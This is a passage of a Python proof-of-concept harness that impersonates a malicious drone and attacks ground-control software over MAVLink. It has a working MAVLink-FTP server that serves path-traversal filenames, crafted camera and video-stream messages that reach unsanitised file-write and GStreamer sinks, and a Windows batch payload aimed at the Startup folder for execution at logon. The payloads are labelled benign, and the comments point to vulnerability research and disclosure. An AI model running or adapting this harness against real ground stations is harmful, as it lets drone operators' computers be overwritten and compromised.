                if isinstance(param_name, bytes):
                    param_name = param_name.decode("utf-8", "ignore")
                param_name = param_name.strip("\x00")
                if param_name:
                    # ParameterManager::refreshParameter() sends this whenever ANY
                    # setup page calls getParameterFact() for a name we haven't
                    # pre-seeded (Radio/Sensors/Flight Modes/Power/... each probe
                    # their own param set). Answering every name we're asked about
                    # -- registering it with an inert default on first sight --
                    # keeps parameterExists() true for whatever the operator clicks
                    # into, instead of re-triggering the "missing from firmware" dialog.
                    if param_name not in self.PARAMS:
                        self.PARAMS[param_name] = 0.0
                    idx = list(self.PARAMS.keys()).index(param_name)
                    self.send_param_value(param_name, self.PARAMS[param_name],
                                          count=len(self.PARAMS), index=idx)
            elif t == "AUTOPILOT_VERSION_REQUEST":
                self.send_autopilot_version()
            elif t == "MISSION_REQUEST_LIST":
                # QGC auto-fetches mission/fence/rally on connect (PlanMasterController).
                # Unanswered, MissionManager retries then raises "Mission transfer
                # failed ... maximum retries exceeded". We carry none of these, so
                # just report an empty list for whichever mission_type was asked.
                mission_type = getattr(msg, "mission_type", 0)
                self.master.mav.mission_count_send(
                    msg.get_srcSystem(), msg.get_srcComponent(), 0, mission_type)
                if self.verbose:
                    observe("GCS requested MISSION_REQUEST_LIST (type=%s) -> replied MISSION_COUNT=0"
                            % mission_type)
            elif t in ("COMMAND_LONG", "COMMAND_INT"):
                c = getattr(msg, "command", None)
                if self.verbose:
                    observe("GCS sent %s command=%s" % (t, c))
                if c == mavutil.mavlink.MAV_CMD_REQUEST_AUTOPILOT_CAPABILITIES:
                    self.send_autopilot_version()
                    self.master.mav.command_ack_send(c, mavutil.mavlink.MAV_RESULT_ACCEPTED)
                elif c == getattr(mavutil.mavlink, "MAV_CMD_REQUEST_MESSAGE", 512) and \
                        int(getattr(msg, "param1", 0)) == mavutil.mavlink.MAVLINK_MSG_ID_AUTOPILOT_VERSION:
                    self.send_autopilot_version()
                    self.master.mav.command_ack_send(c, mavutil.mavlink.MAV_RESULT_ACCEPTED)
            elif t in ("REQUEST_DATA_STREAM", "MESSAGE_INTERVAL"):
                if self.verbose:
                    observe("GCS requested: %s" % t)
            elif t == "HEARTBEAT":
                pass

    # -- generic raw send for dialect-unknown messages ----------------------
    def _send_raw(self, msgid, name, fields, crc_extra, values):
        """Hand-frame a MAVLink2 packet for a message pymavlink doesn't know."""
        payload = _wire_payload(fields, values)
        # MAVLink2 truncates trailing zero bytes of the payload on the wire.
        trimmed = payload.rstrip(b"\x00")
        if len(trimmed) == 0:
            trimmed = b"\x00"
        with self._seq_lock:
            seq = self.master.mav.seq & 0xFF
            self.master.mav.seq = (self.master.mav.seq + 1) % 256
        hdr = struct.pack("<BBBBBB", len(trimmed), 0, 0, seq, self.sysid, self.compid)
        hdr += struct.pack("<BBB", msgid & 0xFF, (msgid >> 8) & 0xFF, (msgid >> 16) & 0xFF)
        frame = b"\xfd" + hdr + trimmed
        crc = x25crc(frame[1:])
        crc.accumulate(bytes([crc_extra]))
        frame += struct.pack("<H", crc.crc)
        # Write straight to the underlying file/socket (bypasses dialect packer).
        self.master.write(frame)
        if self.verbose:
            attack("sent raw %s (id=%d, %d payload bytes) -> GCS" % (name, msgid, len(trimmed)))

    # ======================================================================
    # Finding-specific payload helpers
    # ======================================================================
    def send_statustext(self, text, severity=mavutil.mavlink.MAV_SEVERITY_INFO):
        """STATUSTEXT — text is char[50]; long strings are chunked by real
        autopilots, but for a PoC marker a single <=50 char chunk is enough."""
        data = text.encode("utf-8", "replace")[:50]
        self.master.mav.statustext_send(severity, data)
        if self.verbose:
            attack("sent STATUSTEXT severity=%d text=%r" % (severity, text))

    def send_autopilot_version(self):
        """AUTOPILOT_VERSION (id 148) -- advertises FTP capability + an
        ArduCopter 4.5.7/Cube Orange identity, matching the MP-01/02/03 PoCs."""
        self.master.mav.autopilot_version_send(
            self.CAPABILITIES, self.FW_VERSION, self.FW_VERSION, 0,
            self.BOARD_VERSION, self.GIT_HASH, self.GIT_HASH, [0] * 8,
            self.VENDOR_ID, self.PRODUCT_ID, self.UID)
        if self.verbose:
            attack("sent AUTOPILOT_VERSION (capabilities=0x%X, fw=0x%X)"
                   % (self.CAPABILITIES, self.FW_VERSION))

    def send_boot_banner(self):
        """A short ArduCopter-style STATUSTEXT boot log, sent once on first
        HEARTBEAT so the vehicle looks like a real ArduPilot boot sequence."""
        for line in self.BOOT_BANNER:
            self.send_statustext(line)

    def send_camera_information(self, vendor_name=b"", model_name=b"",
                                cam_definition_uri=b"", cam_definition_version=1,
                                flags=None):
        """CAMERA_INFORMATION (id 259). vendor_name/model_name are uint8_t[32],
        cam_definition_uri is char[140]. We allow attacker-chosen bytes incl. '../'."""
        if isinstance(vendor_name, str):
            vendor_name = vendor_name.encode("utf-8", "replace")
        if isinstance(model_name, str):
            model_name = model_name.encode("utf-8", "replace")
        if isinstance(cam_definition_uri, str):
            cam_definition_uri = cam_definition_uri.encode("utf-8", "replace")
        # CAMERA_CAP_FLAGS_HAS_VIDEO_STREAM=256 keeps QGC happy; HAS_BASIC etc not needed.
        if flags is None:
            flags = mavutil.mavlink.CAMERA_CAP_FLAGS_HAS_VIDEO_STREAM
        # pymavlink wants list-of-ints for the uint8_t[32] vendor/model arrays.
        v = list((vendor_name + b"\x00" * 32)[:32])
        mdl = list((model_name + b"\x00" * 32)[:32])
        # This dialect build ships the CAMERA_INFORMATION class but not a
        # camera_information_send() helper, so build the message and .send() it.
        from pymavlink.dialects.v20 import ardupilotmega as _M
        msg = _M.MAVLink_camera_information_message(
            int(time.time() * 1000) & 0xFFFFFFFF,  # time_boot_ms
            v, mdl,                                 # vendor_name, model_name (uint8[32])
            0,                                      # firmware_version
            0.0, 0.0, 0.0,                          # focal_length, sensor_size_h/v
            0, 0,                                   # resolution_h/v
            0,                                      # lens_id
            flags,                                  # flags
            cam_definition_version,                 # cam_definition_version
            cam_definition_uri)                     # cam_definition_uri (char[140])
        self.master.mav.send(msg)
        if self.verbose:
            attack("sent CAMERA_INFORMATION vendor=%r model=%r uri=%r"
                   % (vendor_name, model_name, cam_definition_uri))

    def send_video_stream_information(self, uri=b"", name=b"poc", stream_id=1,
                                      count=1, vtype=None):
        """VIDEO_STREAM_INFORMATION (id 269). uri is char[160]; MissionPlanner's
        CameraProtocol passes a uri beginning 'gst://' straight to gst_parse_launch."""
        if isinstance(uri, str):
            uri = uri.encode("utf-8", "replace")
        if isinstance(name, str):
            name = name.encode("utf-8", "replace")
        if vtype is None:
            vtype = mavutil.mavlink.VIDEO_STREAM_TYPE_RTSP
        # No video_stream_information_send() helper in this dialect build; build+send.
        from pymavlink.dialects.v20 import ardupilotmega as _M
        msg = _M.MAVLink_video_stream_information_message(
            stream_id, count, vtype,
            mavutil.mavlink.VIDEO_STREAM_STATUS_FLAGS_RUNNING,  # flags
            30.0,            # framerate
            1280, 720,       # resolution_h/v
            4000,            # bitrate
            0,               # rotation
            90,              # hfov
            name,            # name (char[32])
            uri)             # uri (char[160])
        self.master.mav.send(msg)
        if self.verbose:
            attack("sent VIDEO_STREAM_INFORMATION uri=%r" % uri)

    def send_param_value(self, param_id, value, ptype=None, count=1, index=0):
        """PARAM_VALUE (id 22). param_id is char[16]."""
        if ptype is None:
            ptype = mavutil.mavlink.MAV_PARAM_TYPE_REAL32
        if isinstance(param_id, str):
            param_id = param_id.encode("utf-8", "replace")
        self.master.mav.param_value_send(param_id, float(value), ptype, count, index)
        if self.verbose:
            attack("sent PARAM_VALUE %r=%s" % (param_id, value))

    def send_component_metadata(self, uri, file_crc=0):
        """COMPONENT_METADATA (id 397) — uri char[100]. Dialect-unknown -> raw frame.
        A GCS/MAVSDK fetches this uri (http(s):// over the network, file:// locally)."""
        msgid, name, fields = _MSG_COMPONENT_METADATA
        self._send_raw(msgid, name, fields, 182, {
            "time_boot_ms": int(time.time() * 1000) & 0xFFFFFFFF,
            "file_crc": file_crc & 0xFFFFFFFF,
            "uri": uri,
        })
        if self.verbose:
            attack("sent COMPONENT_METADATA uri=%r" % uri)

    def send_component_information(self, general_uri, peripherals_uri="",
                                   general_crc=0, peripherals_crc=0):
        """COMPONENT_INFORMATION (id 395, deprecated but still consumed by older
        QGC). general_metadata_uri / peripherals_metadata_uri are char[100]."""
        msgid, name, fields = _MSG_COMPONENT_INFORMATION
        self._send_raw(msgid, name, fields, 0, {
            "time_boot_ms": int(time.time() * 1000) & 0xFFFFFFFF,
            "general_metadata_file_crc": general_crc & 0xFFFFFFFF,
            "peripherals_metadata_file_crc": peripherals_crc & 0xFFFFFFFF,
            "general_metadata_uri": general_uri,
            "peripherals_metadata_uri": peripherals_uri,
        })
        if self.verbose:
            attack("sent COMPONENT_INFORMATION general_uri=%r" % general_uri)

    # ======================================================================
    # MAVLink-FTP SERVER
    # ----------------------------------------------------------------------
    # The GCS is the FTP *client*; we are the *server*. We answer ListDirectory,
    # OpenFileRO, ReadFile and the BurstReadFile path with attacker-chosen
    # filenames and contents. Wire format mirrors GCS_FTP.cpp / MAVFtp.cs:
    #   payload[0:2]=seq(LE16) [2]=session [3]=opcode [4]=size [5]=req_opcode
    #   [6]=burst_complete [7]=pad [8:12]=offset(LE32) [12:]=data
    # ======================================================================
    PAYLOAD_LEN = 251
    HDR = 12
    MAX_DATA = PAYLOAD_LEN - HDR        # 239 data bytes
    # opcodes (FTP_OP)
    OP_NONE = 0
    OP_TERMINATE = 1
    OP_RESET = 2
    OP_LIST = 3
    OP_OPEN_RO = 4
    OP_READ = 5
    OP_OPEN_WO = 6
    OP_BURST_READ = 15
    OP_LIST_WITH_TIME = 16   # kCmdListDirectoryWithTime -- newer opcode QGC Daily
                             # probes FIRST on every listDirectory() call (FTPManager.cc);
                             # it only falls back to plain OP_LIST if we NACK this
                             # specific request with ERR_UNKNOWN_COMMAND (see below).
    OP_ACK = 128
    OP_NACK = 129
    # NACK error codes
    ERR_FAIL = 1
    ERR_EOF = 6
    ERR_UNKNOWN_COMMAND = 7
    ERR_FILE_NOT_FOUND = 10

    def add_ftp_file(self, name, content):
        """Register a file the FTP server will serve. `name` may contain traversal
        ('..\\..\\plugins\\evil.cs') or be absolute — that is the whole point."""
        if isinstance(content, str):
            content = content.encode("utf-8")
        self.ftp_files[name] = content

    def add_ftp_dir_entry(self, name, size=None, is_dir=False, mtime=None):
        """Add an entry to what ListDirectory returns. `name` may be a traversal/abs path."""
        if size is None:
            size = len(self.ftp_files.get(name, b""))
        self.ftp_dir_entries.append((name, size, is_dir))
        if not hasattr(self, "ftp_dir_mtimes"):
            self.ftp_dir_mtimes = {}
        if mtime is not None:
            self.ftp_dir_mtimes[name] = int(mtime)

    def _ftp_reply(self, req, opcode, size=0, req_opcode=0, burst=0, offset=0,
                   data=b"", session=None, seq=None):
        p = bytearray(self.PAYLOAD_LEN)
        # ACK seq defaults to req seq + 1. A multi-chunk BurstReadFile MUST
        # increment per chunk: QGC drops any ack whose seqNumber is below
        # _expectedIncomingSeqNumber and advances that after every non-final
        # chunk. Re-using one seq delivers only the first 239 bytes -- invisible
        # on a tiny file, fatal on a multi-megabyte log.
        seq_val = (req["seq"] + 1) if seq is None else seq
        struct.pack_into("<H", p, 0, seq_val & 0xFFFF)
        # OpenFileRO must hand the client a NEW session id in the ACK header; for
        # all other replies we echo the request's session.
        p[2] = (req["session"] if session is None else session) & 0xFF
        p[3] = opcode & 0xFF
        p[4] = size & 0xFF
        p[5] = req_opcode & 0xFF
        p[6] = burst & 0xFF
        struct.pack_into("<I", p, 8, offset & 0xFFFFFFFF)
        d = data[:self.MAX_DATA]
        p[self.HDR:self.HDR + len(d)] = d
        as_comp = req.get("target_comp", self.compid)
        with self._send_lock:
            old = self.master.mav.srcComponent
            self.master.mav.srcComponent = as_comp
            try:
                self.master.mav.file_transfer_protocol_send(
                    0, req["src_sys"], req["src_comp"], list(p))
            finally:
                self.master.mav.srcComponent = old

    def _handle_ftp(self, msg):
        raw = bytes(bytearray(msg.payload))
        req = {
            "seq": struct.unpack_from("<H", raw, 0)[0],
            "session": raw[2],
            "opcode": raw[3],
            "size": raw[4],
            "req_opcode": raw[5],
            "burst": raw[6],
            "offset": struct.unpack_from("<I", raw, 8)[0],
            "data": raw[self.HDR:self.HDR + raw[4]],
            "src_sys": msg.get_srcSystem(),
            "src_comp": msg.get_srcComponent(),
            # FTPManager::_mavlinkMessageReceived drops any reply whose compid is
            # not _ftpCompId -- and _ftpCompId is whichever component the request
            # was addressed to (the camera's 100 for a cam_definition fetch, 1 for
            # @PARAM/param.pck). Reply as that component or the ACK is discarded
            # and the download silently times out.
            "target_comp": getattr(msg, "target_component", self.compid),
        }
        op = req["opcode"]
        if self.verbose:
            observe("MAVFTP request: opcode=%d size=%d offset=%d data=%r"
                    % (op, req["size"], req["offset"], req["data"]))

        if op == self.OP_LIST:
            self._ftp_list(req)
        elif op == self.OP_OPEN_RO:
            self._ftp_open_ro(req)
        elif op == self.OP_READ:
            self._ftp_read(req, burst=False)
        elif op == self.OP_BURST_READ:
            self._ftp_read(req, burst=True)
        elif op == self.OP_TERMINATE or op == self.OP_RESET:
            self._ftp_sessions.pop(req["session"], None)
            self._ftp_reply(req, self.OP_ACK, req_opcode=op)
        elif op == self.OP_LIST_WITH_TIME:
            # QGC-04 REQUIRES this opcode to be answered. If we NACK it,
            # FTPManager sets listDirectoryWithTimeUnsupported() and
            # OnboardLogController::_ftpFinishListing() then DISCARDS every entry
            # we just served and falls back to the message-based LOG_ENTRY/LOG_DATA
            # transport (OnboardLogController.cc:1122-1128) -- which this harness
            # does not implement, so the log list renders empty. Answer it with
            # the 3-field form "F<name>\t<size>\t<mtime>".
            self._ftp_list(req, with_time=True)
        else:
            # Any other opcode we don't implement: NACK as "unknown command"
            # (not a generic FAIL) so a client that probes for optional/newer
            # opcodes falls back correctly instead of treating it as a hard error.
            self._ftp_reply(req, self.OP_NACK, size=1, req_opcode=op,
                            data=bytes([self.ERR_UNKNOWN_COMMAND]))

    def _ftp_list(self, req, with_time=False):
        """ListDirectory: each entry is a type byte ('F'/'D'/'S') then a NUL-
        terminated string. For a file MissionPlanner expects 'name\\tsize'
        (MAVFtp.cs:1310-1321 tab-split). We pack as many entries as fit from the
        requested offset; EOF -> NACK(EndOfFile)."""
        offset = req["offset"]
        if offset >= len(self.ftp_dir_entries):
            self._ftp_reply(req, self.OP_NACK, size=1, req_opcode=req["opcode"],
                            data=bytes([self.ERR_EOF]))
            return
        blob = b""
        i = offset
        while i < len(self.ftp_dir_entries):
            name, size, is_dir = self.ftp_dir_entries[i]
            if is_dir:
                entry = b"D" + name.encode("utf-8") + b"\x00"
            else:
                if with_time:
                    # kCmdListDirectoryWithTime: name \t size \t mtime(unix secs UTC)
                    mtime = self.ftp_dir_mtimes.get(name, 0)
                    entry = b"F" + ("%s\t%d\t%d" % (name, size, mtime)).encode("utf-8") + b"\x00"
                else:
                    entry = b"F" + ("%s\t%d" % (name, size)).encode("utf-8") + b"\x00"
            if len(blob) + len(entry) > self.MAX_DATA:
                break
            blob += entry
            i += 1
        self._ftp_reply(req, self.OP_ACK, size=len(blob), req_opcode=req["opcode"],
                        offset=offset, data=blob)
        if self.verbose:
            attack("served MAVFTP ListDirectory: %d entr%s (offset %d) incl. attacker filenames"
                   % (i - offset, "y" if i - offset == 1 else "ies", offset))

    def _resolve_ftp_file(self, path_bytes):
        """Map an OpenFileRO path back to a registered attacker file.

        The GCS requests whatever we advertised in ListDirectory, but prefixed
        with the directory it listed -- e.g. we advertise "00000042.BIN" and QGC
        asks for "@MAV_LOG/00000042.BIN". So the requested path can be LONGER
        than the registered key, and a one-directional endswith() test fails.
        Try, in order: exact, basename-vs-basename, key endswith request,
        request endswith key, then a single-file fallback.
        """
        path = path_bytes.decode("utf-8", "replace").lstrip("/").rstrip("\x00")
        # QGC requests "@PARAM/param.pck?withdefaults=1" -- the query string must
        # not defeat basename matching, or the single-file fallback answers the
        # parameter download with whatever else we happen to be serving.
        if "?" in path:
            path = path.split("?", 1)[0]
        norm = lambda p: p.lstrip("/").replace("\\", "/")
        base = lambda p: norm(p).rsplit("/", 1)[-1]

        if path in self.ftp_files:
            return path, self.ftp_files[path]

        # basename match -- the normal case for a listed directory
        pb = base(path)
        for k, v in self.ftp_files.items():
            if base(k) == pb:
                return k, v

        # either direction of suffix match (traversal names, nested dirs)
        for k, v in self.ftp_files.items():
            if norm(k).endswith(norm(path)) or norm(path).endswith(norm(k)):
                return k, v

        if len(self.ftp_files) == 1:
            k = next(iter(self.ftp_files))
            return k, self.ftp_files[k]

        warn("OpenFileRO for %r matched no registered file (have: %s)"
             % (path, ", ".join(sorted(self.ftp_files))))
        return None, None

    def _ftp_open_ro(self, req):
        name, content = self._resolve_ftp_file(req["data"])
        if content is None:
            self._ftp_reply(req, self.OP_NACK, size=1, req_opcode=self.OP_OPEN_RO,
                            data=bytes([self.ERR_FILE_NOT_FOUND]))
            return
        session = (max(self._ftp_sessions) + 1) if self._ftp_sessions else 1
        self._ftp_sessions[session] = (name, content)
        # ACK header carries the new session id; ACK data = file size (LE32),
        # matching GCS_FTP.cpp OpenFileRO which returns the size in the payload.
        self._ftp_reply(req, self.OP_ACK, size=4, req_opcode=self.OP_OPEN_RO,
                        data=struct.pack("<I", len(content)), session=session)
        if self.verbose:
            attack("served MAVFTP OpenFileRO -> session=%d, %d bytes of attacker content"
                   % (session, len(content)))

    def _ftp_read(self, req, burst):
        sess = self._ftp_sessions.get(req["session"])
        if sess is None:
            self._ftp_reply(req, self.OP_NACK, size=1,
                            req_opcode=self.OP_BURST_READ if burst else self.OP_READ,
                            data=bytes([self.ERR_FAIL]))
            return
        _name, content = sess
        offset = req["offset"]
        if offset >= len(content):
            self._ftp_reply(req, self.OP_NACK, size=1,
                            req_opcode=self.OP_BURST_READ if burst else self.OP_READ,
                            data=bytes([self.ERR_EOF]))
            return
        if not burst:
            chunk = content[offset:offset + min(req["size"] or self.MAX_DATA, self.MAX_DATA)]
            self._ftp_reply(req, self.OP_ACK, size=len(chunk), req_opcode=self.OP_READ,
                            offset=offset, data=chunk)
            return
        # Burst path: stream chunks until EOF, marking burst_complete on the last.
        pos = offset
        seq = req["seq"] + 1
        while pos < len(content):
            chunk = content[pos:pos + self.MAX_DATA]
            pos += len(chunk)
            last = pos >= len(content)
            self._ftp_reply(req, self.OP_ACK, size=len(chunk), req_opcode=self.OP_BURST_READ,
                            burst=1 if last else 0, offset=pos - len(chunk), data=chunk,
                            seq=seq)
            seq = (seq + 1) & 0xFFFF
        if self.verbose:
            attack("served MAVFTP BurstReadFile: %d bytes from offset %d" % (len(content) - offset, offset))


# ---------------------------------------------------------------------------
# self-test: confirm the hand-rolled CRC_EXTRA matches known + audited values.
# Run:  python3 fake_vehicle_harness.py --selftest
# ---------------------------------------------------------------------------
def _selftest():
    # CAMERA_INFORMATION (non-extension fields only) must yield the dialect's 92.
    cam = [("uint32_t", "time_boot_ms", 0), ("uint8_t", "vendor_name", 32),
           ("uint8_t", "model_name", 32), ("uint32_t", "firmware_version", 0),
           ("float", "focal_length", 0), ("float", "sensor_size_h", 0),
           ("float", "sensor_size_v", 0), ("uint16_t", "resolution_h", 0),
           ("uint16_t", "resolution_v", 0), ("uint8_t", "lens_id", 0),
           ("uint32_t", "flags", 0), ("uint16_t", "cam_definition_version", 0),
           ("char", "cam_definition_uri", 140)]
    got = _crc_extra("CAMERA_INFORMATION", cam)
    assert got == 92, "CAMERA_INFORMATION crc_extra %d != 92" % got
    assert _crc_extra(*_MSG_COMPONENT_METADATA[1:]) == 182, "COMPONENT_METADATA crc_extra mismatch"
    assert _crc_extra(*_MSG_COMPONENT_INFORMATION[1:]) == 0, "COMPONENT_INFORMATION crc_extra mismatch"
    ok("selftest OK: CRC_EXTRA(CAMERA_INFORMATION)=92, COMPONENT_METADATA=182, COMPONENT_INFORMATION=0")
# ============================== end embedded harness ==============================


# A benign Lua script body. Its only role is to be the bytes QGC writes to the
# attacker-chosen local path. NOT executed by QGC -- it is a downloaded artifact.
BENIGN_LUA = (
    b"-- QGC-03 benign PoC marker (path-traversal local write)\n"
    b"-- If you are reading this OUTSIDE the chosen QGC save folder, the\n"
    b"-- vehicle-supplied listing filename traversed the write path.\n"
    b'gcs:send_text(6, "QGC-03 benign marker")\n'
)

# BENIGN Windows batch payload, for demonstrating that the traversal controls the
# file EXTENSION as well as the path and content. Dropped into the per-user Startup
# folder it runs at next logon via ShellExecute -- '.lua' does not (no shell
# association), which is why the extension has to change along with the body.
#
# It is deliberately inert: appends a timestamped marker under %USERPROFILE% and
# opens it in Notepad so the operator SEES it fired. No network, no persistence
# beyond the file QGC itself wrote, no registry writes. Delete the .bat from
# Startup and the marker from %USERPROFILE% to clean up.
#
# CRLF line endings: cmd.exe tolerates LF but is historically flaky with it on
# multi-line constructs, and QGC writes the bytes through verbatim.
BENIGN_BAT = (
    b"@echo off\r\n"
    b"REM QGC-03 benign PoC marker (MAVFTP listing path traversal -> logon execution)\r\n"
    b'set "MARK=%USERPROFILE%\\QGC03_EXEC_PROOF.txt"\r\n'
    b'>>"%MARK%" echo [QGC-03] attacker-supplied .bat executed at %DATE% %TIME%\r\n'
    b'>>"%MARK%" echo     user=%USERNAME%  host=%COMPUTERNAME%\r\n'
    b'>>"%MARK%" echo     ran-from=%~f0\r\n'
    b'>>"%MARK%" echo     delivered-by=malicious vehicle over MAVLink-FTP, written by QGC\r\n'
    b'>>"%MARK%" echo.\r\n'
    b'start "" notepad "%MARK%"\r\n'
    b"exit /b 0\r\n"
)

# Built-in payload bodies selectable with --payload.
PAYLOADS = {"lua": BENIGN_LUA, "bat": BENIGN_BAT}# ---------------------------------------------------------------------------
# QGC-01 -- CAMERA_INFORMATION vendor_name/model_name -> traversed file write
#
# WHY THE ORIGINAL PoC (poc_G04_*.py) COULD NEVER WORK
# ---------------------------------------------------
# It heartbeats as compid 1 and sends CAMERA_INFORMATION unsolicited. QGC drops
# that on the floor -- QGCCameraManager.cc:
#
#     void QGCCameraManager::_handleCameraInfo(const mavlink_message_t& message)
#     {
#         const QString sCompID = QString::number(message.compid);
#         if (!_cameraInfoRequest.contains(sCompID)) {
#             qCDebug(...) << "Ignoring - Camera info not requested for component" ...;
#             return;
#         }
#
# `_cameraInfoRequest` is populated ONLY by _handleHeartbeat(), which is reached
# only when `fromCamera` is true -- i.e. compid in MAV_COMP_ID_CAMERA..CAMERA6
# (100..105), per the gate at QGCCameraManager.cc:164-177. An autopilot heartbeat
# is explicitly excluded there ("Autopilot heartbeats should not be treated as
# camera discovery").
#
# So the sequence QGC actually requires is:
#   1. HEARTBEAT from compid 100  ->  _handleHeartbeat -> _requestCameraInfo()
#   2. QGC sends MAV_CMD_REQUEST_MESSAGE(CAMERA_INFORMATION) (or
#      MAV_CMD_REQUEST_CAMERA_INFORMATION) TO compid 100, alternating between the
#      two across retries (QGCCameraManager.cc:576-581)
#   3. we COMMAND_ACK it from compid 100 and send CAMERA_INFORMATION from compid 100
#   4. _handleCameraInfo accepts it -> createCameraControl() -> the sink
#
# Note also `infoReceived` latches after the first accepted message, so the info
# is consumed exactly once per component per connection -- spamming it does not
# help, and re-testing needs a reconnect or a fresh camera compid.
#
# THE SINK (VehicleCameraControl.cc, master d62dcff)
# -------------------------------------------------
#     _vendor    = QString(reinterpret_cast<const char*>(info->vendor_name));   // :117
#     _modelName = QString(reinterpret_cast<const char*>(info->model_name));    // :118
#     _cacheFile = QString::asprintf("%s/%s_%s_%03d.xml",                       // :119-123
#                       parameterSavePath()..., _vendor..., _modelName..., cam_definition_version);
#     ...
#     QFile file(_cacheFile);                                                   // :931
#     if (!file.open(QIODevice::WriteOnly)) { ... } else { file.write(originalData); }
#
# No sanitisation of '/' or '..'. `originalData` is the definition XML fetched
# from cam_definition_uri -- which we also control. So path AND content are ours.
#
# Second sink, the mftp branch (:2199-2207): the filename is formatted the same
# way and handed to FTPManager::download() as an EXPLICIT fileName -- the same
# unsanitised branch documented in QGC-03 (GHSA-9q69-3f77-jhw8). One basename fix
# in FTPManager closes both.
#
# THE CONSTRAINT, STATED HONESTLY
# -------------------------------
# The format string always appends `_<model>_<NNN>.xml`, so the written file's
# name always ends in `.xml` (or `.xml.lzma` / `.xml.xz` on the mftp branch). The
# attacker picks the directory and most of the name, but not the extension. That
# rules out the MP-01 / QGC-03 style amplifiers (no `.cs` into plugins\, no `.bat`
# into Startup). What remains is an arbitrary-path write of an `.xml`-named file
# with attacker-chosen content, and truncation of any writable `.xml`
# (QIODevice::WriteOnly truncates).
#
# `--mode ads` probes whether an NTFS alternate-data-stream suffix escapes that
# constraint. UNTESTED, and expected to fail -- included so the answer is measured
# rather than assumed.
# ---------------------------------------------------------------------------

MAV_COMP_ID_CAMERA = 100

AP_PARAM_FLOAT = 4
MAGIC_WITHDEFAULTS = 0x671C


def _param_pck_entry(name: bytes, value: float) -> bytes:
    """One param.pck entry, common_len=0 so no prefix compression is implied."""
    name_len = len(name)
    b0 = (0x01 << 4) | AP_PARAM_FLOAT          # flags bit0 = withdefault
    b1 = ((name_len - 1) & 0x0F) << 4          # common_len = 0
    return bytes([b0, b1]) + name + struct.pack("<ff", value, value)


def build_param_pck() -> bytes:
    """A complete, well-formed ArduCopter param.pck.

    QGCCameraManager::_mavlinkMessageReceived() begins with

        if (!_initialConnectComplete) { return; }

    so until QGC finishes its initial connect sequence EVERY camera heartbeat is
    discarded before the compid gate is even reached -- and the parameter download
    is part of that sequence. Serving a real parameter set is therefore a
    prerequisite for this finding to be reachable at all, not dressing.
    """
    defaults = {}
    for line in _COPTER_DEFAULT_PARAMS_TSV.strip().split("\n"):
        parts = line.split()
        if len(parts) >= 2:
            try:
                defaults[parts[0]] = float(parts[1])
            except ValueError:
                pass
    entries = []
    for nm in sorted(defaults):
        nb = nm.encode("ascii", "ignore")
        if 1 <= len(nb) <= 16:
            entries.append(_param_pck_entry(nb, defaults[nm]))
    num = len(entries)
    return struct.pack("<HHH", MAGIC_WITHDEFAULTS, num, num) + b"".join(entries)

# A *valid* MAVLink camera definition. The validity matters, and it is easy to
# get wrong: the two write sinks in VehicleCameraControl.cc have different
# requirements.
#
#   sink 1  FTPManager::download() -> parameterSavePath()/<vendor>_<model>_NNN.xml
#           FTPManager writes the bytes itself, so the XML is never parsed and
#           ANY content reaches disk. Reached only when the target does NOT
#           already exist (the !xmlFile.exists() gate at :2192).
#
#   sink 2  the cache-write at VehicleCameraControl.cc:931
#               QFile file(_cacheFile);
#               file.open(QIODevice::WriteOnly);   // TRUNCATES
#           gated on !_cached, and only reached if _loadCameraDefinitionFile()
#           got all the way through. That needs:
#             * <definition version=".."> with <model> and <vendor>   (_loadConstants)
#             * a NON-EMPTY <parameters> block  -- :925 bails on size()==0
#             * every <parameter> to carry name= and type= AND a <description>
#               child -- :1012 returns false without it
#             * at least one fact actually added, or _loadSettings returns
#               false at its tail (_nameToFactMetaDataMap.size() > 0)
#           An earlier revision of this PoC served <parameters/> (empty), which
#           fails the third condition, so sink 2 could never fire and the
#           overwrite test silently proved nothing.
BENIGN_CAM_DEF_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<mavlinkcamera>
  <definition version="1">
    <model>QGC01-BENIGN-MARKER</model>
    <vendor>infected-drones research</vendor>
  </definition>
  <parameters>
    <parameter name="QGC01_MARKER" type="uint32" default="0">
      <description>infected-drones QGC-01 benign marker parameter</description>
    </parameter>
  </parameters>
  <localization/>
</mavlinkcamera>
"""


class CameraVehicle(FakeVehicle):
    """Adds a camera component: a second heartbeat stream on compid 100, and a
    CAMERA_INFORMATION responder that answers the request QGC addresses to it."""

    def __init__(self, *a, **kw):
        self.cam_compid = kw.pop("cam_compid", MAV_COMP_ID_CAMERA)
        self.cam_vendor = kw.pop("cam_vendor", "")
        self.cam_model = kw.pop("cam_model", "")
        self.cam_uri = kw.pop("cam_uri", "")
        self.cam_version = kw.pop("cam_version", 1)
        super().__init__(*a, **kw)
        self._cam_hb_thread = None
        self._cam_info_sent = 0

    # -- send as the camera component ---------------------------------------
    def _as_camera(self, fn, *a, **kw):
        """pymavlink stamps srcComponent at send time, so swap it around the call.

        Serialised against the other senders: the autopilot heartbeat thread, the
        camera heartbeat thread and the FTP replies all restamp the same field on
        one shared MAVLink object, so without a lock a concurrent send can be
        emitted under the wrong component id.
        """
        with self._send_lock:
            old = self.master.mav.srcComponent
            self.master.mav.srcComponent = self.cam_compid
            try:
                return fn(*a, **kw)
            finally:
                self.master.mav.srcComponent = old

    def start(self):
        super().start()
        self._cam_hb_thread = threading.Thread(target=self._camera_heartbeat_loop, daemon=True)
        self._cam_hb_thread.start()

    def _camera_heartbeat_loop(self):
        # MAV_TYPE_CAMERA on compid 100. This is what puts us into
        # _cameraInfoRequest and makes QGC ask for CAMERA_INFORMATION.
        while self._running:
            try:
                self._as_camera(
                    self.master.mav.heartbeat_send,
                    getattr(mavutil.mavlink, "MAV_TYPE_CAMERA", 30),
                    mavutil.mavlink.MAV_AUTOPILOT_INVALID,
                    base_mode=0, custom_mode=0,
                    system_status=mavutil.mavlink.MAV_STATE_ACTIVE)
            except Exception as e:
                if self.verbose:
                    warn("camera heartbeat failed: %s" % e)
            time.sleep(1.0)

    def send_camera_info_now(self):
        self._cam_info_sent += 1
        self._as_camera(self.send_camera_information,
                        vendor_name=self.cam_vendor,
                        model_name=self.cam_model,
                        cam_definition_uri=self.cam_uri,
                        cam_definition_version=self.cam_version)
        attack("sent CAMERA_INFORMATION #%d from compid %d"
               % (self._cam_info_sent, self.cam_compid))
        observe("  vendor_name = %r" % self.cam_vendor)
        observe("  model_name  = %r" % self.cam_model)
        observe("  uri         = %r" % self.cam_uri)

    # -- answer the request QGC addresses to the camera ---------------------
    def _rx_loop(self):
        # Wrap the base loop so we can also watch for the camera-info request.
        while self._running:
            try:
